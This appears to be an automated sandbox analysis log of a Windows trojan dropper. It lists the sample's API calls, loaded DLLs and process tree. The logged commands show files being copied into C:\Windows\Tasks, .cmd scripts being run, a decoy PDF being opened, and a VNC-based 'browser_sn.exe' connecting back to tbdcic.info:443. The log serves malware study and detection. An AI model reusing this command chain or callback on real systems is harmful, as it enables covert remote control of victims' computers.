                            Source: conhost.exe.8.drBinary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp
                            Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@69/63@4/1
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00408DBF
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,24_2_00007FF790C434B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C43550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,24_2_00007FF790C43550
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C418A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,24_2_00007FF790C418A0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,28_2_00007FF790C434B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C43550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,28_2_00007FF790C43550
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C418A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,28_2_00007FF790C418A0
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW,0_2_004011D1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,24_2_00007FF790C42D00
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,28_2_00007FF790C42D00
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C99BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,24_2_00007FF790C99BC0
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_0040385E
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401DC9
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Downloads\Lom.pdfJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                            Source: C:\Windows\Tasks\browser_sn.exeMutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile created: C:\Users\user~1\AppData\Local\Temp\7ZipSfx.000Jump to behavior
                            Source: T8xrZb7nBL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "browser_sn.exe")
                            Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "browser_sn.exe")
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: browser_sn.exeString found in binary or memory: -startservice
                            Source: browser_sn.exeString found in binary or memory: -install
                            Source: browser_sn.exeString found in binary or memory: -stopservice
                            Source: browser_sn.exeString found in binary or memory: -startservice
                            Source: browser_sn.exeString found in binary or memory: -install
                            Source: browser_sn.exeString found in binary or memory: -stopservice
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile read: C:\Users\user\Desktop\T8xrZb7nBL.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\T8xrZb7nBL.exe "C:\Users\user\Desktop\T8xrZb7nBL.exe"
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1728,i,947990923128245266,18181737680692098631,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 600
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmdJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmdJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmdJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 600Jump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1728,i,947990923128245266,18181737680692098631,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: apphelp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winmm.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: userenv.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wtsapi32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dwmapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winsta.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: napinsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wshbth.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winrnr.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wldp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winmm.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: userenv.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wtsapi32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dwmapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: napinsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wshbth.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winrnr.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
